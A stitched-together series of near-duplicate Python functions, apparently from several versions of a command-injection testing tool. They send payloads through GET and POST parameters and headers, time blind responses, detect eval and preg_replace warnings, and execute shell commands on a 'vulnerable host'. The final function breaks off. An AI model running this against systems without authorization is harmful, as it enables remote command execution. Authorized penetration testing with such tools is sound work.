def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = ''.join(str(e) for e in parameter).replace("+","%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url, data.encode(settings.UNICODE_ENCODING))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+", "%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
urllib.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except:
pass
request = urllib2.Request(url, data)
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Get the response of the request
response = requests.get_request_response(request)
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
if " " in payload:
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Get the response of the request.
response = requests.get_request_response(request)
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
# Check if defined HTTP method is not POST.
if http_request_method != settings.HTTPMETHOD.POST:
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url, http_request_method)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter, http_request_method)
parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url,
data.encode(settings.DEFAULT_CODEC))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Get the response of the request
response = requests.get_request_response(request)
return response, vuln_parameter
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+", "%2B")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long, vuln_parameter
def authentication_process():
auth_url = menu.options.auth_url
auth_data = menu.options.auth_data
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = opener.open(urllib2.Request(auth_url))
cookies = ""
for cookie in cj:
cookie_values = cookie.name + "=" + cookie.value + "; "
cookies += cookie_values
if len(cookies) != 0 :
menu.options.cookie = cookies.rstrip()
if settings.VERBOSITY_LEVEL >= 1:
success_msg = "The received cookie is "
success_msg += menu.options.cookie + Style.RESET_ALL + "."
print settings.print_success_msg(success_msg)
urllib2.install_opener(opener)
request = urllib2.Request(auth_url, auth_data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
return response
def authentication_process():
auth_url = menu.options.auth_url
auth_data = menu.options.auth_data
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = opener.open(urllib2.Request(auth_url))
cookies = ""
for cookie in cj:
cookie_values = cookie.name + "=" + cookie.value + "; "
cookies += cookie_values
if len(cookies) != 0:
menu.options.cookie = cookies.rstrip()
if settings.VERBOSITY_LEVEL >= 1:
success_msg = "The received cookie is "
success_msg += menu.options.cookie + Style.RESET_ALL + "."
print settings.print_success_msg(success_msg)
urllib2.install_opener(opener)
request = urllib2.Request(auth_url, auth_data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
return response
def heuristic_basic(url, http_request_method):
test_type = "code injection"
try:
try:
if re.findall(r"=(.*)&", url):
url = url.replace("/&", "/e&")
elif re.findall(r"=(.*)&", menu.options.data):
menu.options.data = menu.options.data.replace("/&", "/e&")
except TypeError as err_msg:
pass
if not settings.IDENTIFIED_WARNINGS:
if settings.VERBOSITY_LEVEL >= 1:
debug_msg = "Performing heuristic (" + test_type + ") test."
print(settings.print_debug_msg(debug_msg))
if http_request_method == "GET":
request = _urllib.request.Request(url.replace(settings.INJECT_TAG, settings.BASIC_TEST))
else:
request = _urllib.request.Request(url, menu.options.data.replace(settings.INJECT_TAG, settings.BASIC_TEST))
headers.do_check(request)
response = requests.get_request_response(request)
html_data = response.read().decode(settings.UNICODE_ENCODING)
for warning in settings.CODE_INJECTION_WARNINGS:
if warning in html_data:
technique = "dynamic code evaluation technique"
info_msg = "Heuristic (" + test_type + ") test shows that target URL might be injectable."
print(settings.print_bold_info_msg(info_msg))
settings.IDENTIFIED_WARNINGS = True
break
return url
except _urllib.error.URLError as err_msg:
print(settings.print_critical_msg(err_msg))
raise SystemExit()
except _urllib.error.HTTPError as err_msg:
print(settings.print_critical_msg(err_msg))
raise SystemExit()
def warning_detection(url, http_request_method):
try:
# Find the host part
url_part = url.split("=")[0]
request = urllib2.Request(url_part)
# Check if defined extra headers.
headers.do_check(request)
response = requests.get_request_response(request)
if response:
response = urllib2.urlopen(request)
html_data = response.read()
err_msg = ""
if "eval()'d code" in html_data:
err_msg = "'eval()'"
if "Cannot execute a blank command in" in html_data:
err_msg = "execution of a blank command,"
if "sh: command substitution:" in html_data:
err_msg = "command substitution"
if "Warning: usort()" in html_data:
err_msg = "'usort()'"
if re.findall(r"=/(.*)/&", url):
if "Warning: preg_replace():" in html_data:
err_msg = "'preg_replace()'"
url = url.replace("/&","/e&")
if "Warning: assert():" in html_data:
err_msg = "'assert()'"
if "Failure evaluating code:" in html_data:
err_msg = "code evaluation"
if err_msg != "":
warn_msg = "A failure message on " + err_msg + " was detected on page's response."
print settings.print_warning_msg(warn_msg)
return url
except urllib2.HTTPError, err_msg:
print settings.print_critical_msg(err_msg)
raise SystemExit()
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long, vuln_parameter
def heuristic_basic(url, http_request_method):
injection_type = "results-based dynamic code evaluation"
technique = "dynamic code evaluation technique"
technique = "(" + injection_type.split(" ")[0] + ") " + technique + ""
if menu.options.skip_heuristics:
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Skipping (basic) heuristic detection for " + technique + "."
print(settings.print_debug_msg(debug_msg))
return url
else:
settings.EVAL_BASED_STATE = True
try:
try:
if re.findall(r"=(.*)&", url):
url = url.replace("/&", "/e&")
elif re.findall(r"=(.*)&", menu.options.data):
menu.options.data = menu.options.data.replace("/&", "/e&")
except TypeError as err_msg:
pass
if not settings.IDENTIFIED_WARNINGS and not settings.IDENTIFIED_PHPINFO:
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Starting (basic) heuristic detection for " + technique + "."
print(settings.print_debug_msg(debug_msg))
for payload in settings.PHPINFO_CHECK_PAYLOADS:
payload = checks.perform_payload_modification(payload)
if settings.VERBOSITY_LEVEL >= 1:
print(settings.print_payload(payload))
if not menu.options.data:
request = _urllib.request.Request(url.replace(settings.INJECT_TAG, payload))
else:
data = menu.options.data.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url, data.encode(settings.UNICODE_ENCODING))
headers.do_check(request)
response = requests.get_request_response(request)
if type(response) is not bool:
html_data = checks.page_encoding(response, action="decode")
match = re.search(settings.CODE_INJECTION_PHPINFO, html_data)
if match:
technique = technique + " (possible PHP version: '" + match.group(1) + "')"
settings.IDENTIFIED_PHPINFO = True
else:
for warning in settings.CODE_INJECTION_WARNINGS:
if warning in html_data:
settings.IDENTIFIED_WARNINGS = True
break
if settings.IDENTIFIED_WARNINGS or settings.IDENTIFIED_PHPINFO:
info_msg = "Heuristic detection shows that target might be injectable via " + technique + "."
print(settings.print_bold_info_msg(info_msg))
break
settings.EVAL_BASED_STATE = False
return url
except (_urllib.error.URLError, _urllib.error.HTTPError) as err_msg:
print(settings.print_critical_msg(err_msg))
raise SystemExit()
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = payload.replace("#", "%23")
# Encoding non-ASCII characters payload.
# payload = _urllib.parse.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(target)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(
url, data.encode(settings.UNICODE_ENCODING))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long, vuln_parameter
def examine_requests(payload, vuln_parameter, http_request_method, url,
timesec, url_time_response):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Encoding non-ASCII characters payload.
# payload = urllib.quote(payload)
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+", "%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
urllib.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except:
pass
request = urllib2.Request(url, data)
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long
def examine_requests(payload, vuln_parameter, http_request_method, url,
timesec, url_time_response):
start = 0
end = 0
start = time.time()
# Check if defined POST data
if not settings.USER_DEFINED_POST_DATA:
# Encoding non-ASCII characters payload.
# payload = _urllib.parse.quote(payload)
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = _urllib.request.Request(target)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter, http_request_method)
parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url,
data.encode(settings.DEFAULT_CODEC))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long
def examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Encoding non-ASCII characters payload.
# payload = urllib.quote(payload)
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined method is POST.
else :
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long
def examine_requests(payload, vuln_parameter, http_request_method, url,
timesec, url_time_response):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+", "%2B")
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
else:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long
def heuristic_basic(url, http_request_method):
technique = "dynamic code evaluation technique"
try:
try:
if re.findall(r"=(.*)&", url):
url = url.replace("/&", "/e&")
elif re.findall(r"=(.*)&", menu.options.data):
menu.options.data = menu.options.data.replace("/&", "/e&")
except TypeError as err_msg:
pass
if not settings.IDENTIFIED_WARNINGS and not settings.IDENTIFIED_PHPINFO:
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Performing heuristic test for " + technique + "."
print(settings.print_debug_msg(debug_msg))
if http_request_method == "GET":
request = _urllib.request.Request(
url.replace(settings.INJECT_TAG, settings.BASIC_TEST))
else:
data = menu.options.data.replace(settings.INJECT_TAG,
settings.BASIC_TEST)
request = _urllib.request.Request(
url, data.encode(settings.UNICODE_ENCODING))
headers.do_check(request)
response = requests.get_request_response(request)
if type(response) is not bool:
html_data = checks.page_encoding(response, action="decode")
match = re.search(settings.CODE_INJECTION_PHPINFO, html_data)
if match:
technique = technique + " (possible PHP version: '" + match.group(
1) + "')"
settings.IDENTIFIED_PHPINFO = True
else:
for warning in settings.CODE_INJECTION_WARNINGS:
if warning in html_data:
settings.IDENTIFIED_WARNINGS = True
break
if settings.IDENTIFIED_WARNINGS or settings.IDENTIFIED_PHPINFO:
info_msg = "Heuristic test shows that target might be injectable via " + technique + "."
print(settings.print_bold_info_msg(info_msg))
return url
except (_urllib.error.URLError, _urllib.error.HTTPError) as err_msg:
print(settings.print_critical_msg(err_msg))
raise SystemExit()
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ","%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix,
whitespace, http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd,
OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload_msg = payload_msg.split(settings.COMMENT)[0]
info_msg = "Executing the '" + cmd.split(
settings.COMMENT)[0] + "' command "
sys.stdout.write("\n" + settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write(
"\n" +
settings.print_payload(payload).split(settings.COMMENT)[0] +
"\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ", "%20")
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ","%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except:
pass
